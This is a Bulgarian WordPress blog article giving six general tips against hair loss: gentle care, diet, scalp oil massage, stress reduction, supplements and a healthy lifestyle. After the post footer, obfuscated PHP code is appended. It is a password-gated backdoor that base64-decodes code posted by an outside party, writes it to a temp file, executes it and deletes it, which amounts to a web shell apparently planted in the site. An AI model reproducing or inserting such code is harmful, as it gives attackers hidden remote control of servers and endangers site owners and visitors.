6 стъпки срещу косопада | Косопад

6 стъпки срещу косопада

Косопадът е нормално явление както при мъжете, така и при жените, но все пак мразим да виждаме как косата ни остава по дрехите, четката и възглавницата.

диета

При някои хора косопадът се дължи само на смяната на сезоните, докато при други е постоянно. Затова ви предлагаме няколко ефективна съвета как да избегнете косопада:

1 . Общи грижи за косата. Избягвайте къпането с много топла вода, тъй като отваря порите и ако косата е по- тънка, пада. Решете се нежно и внимателно с четката, а не грубо. Ако косата ви е дълга, не я дръжте дълго време вързана. Ако е възможно, избягвайте боядисването на косата, тъй като много уврежда.

2 . Избягвайте джънк фуд – от типа чипс, хамбургери, бонбони, сладкиши и др. подобни. За да е здрава косата ви, трябва да се храните здравословно и да спортувате. Включете  храни, богати на протеини като овес, ориз, зърнени храни, бобови, месо. Много е важно да пиете вода – не само ще поддържа кожата ви, но и ще направи корените по- здрави. Строгите диети могат да се отразят лошо на косата ви, затова се хранете балансирано.

3 . Масаж на косата. Масажът с етерично масло е добър начин да подхранвате косата. Нанесете го по кожата на косопад45главата с масажиращи движения. Може да използвате зехтин, бадемово масло или кокосово масло.

4 . Преборете стреса. Стресът засяга цялото тяло и косата не е изключение. Трябва да се успокоите, да спите достатъчно и да спортувате. Правенето на упражнения не е полезно само срещу стреса, но се отразява положително и на цялото ви тяло. Отделете време за почивка и медитация.

5 . Вземете добавки. Ако няма какво друго на направите, консултирайте се с лекар за подходящи витамини и минерали.

6 . Водете здравословен начин на живот. Стремете се да водите здравословен начин на живот. Хубава храна, спорт и почивка не само ще намалят стреса, но и ще ви направят доста по- здрави и красиви.

29. януари 2014 11:09:12 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}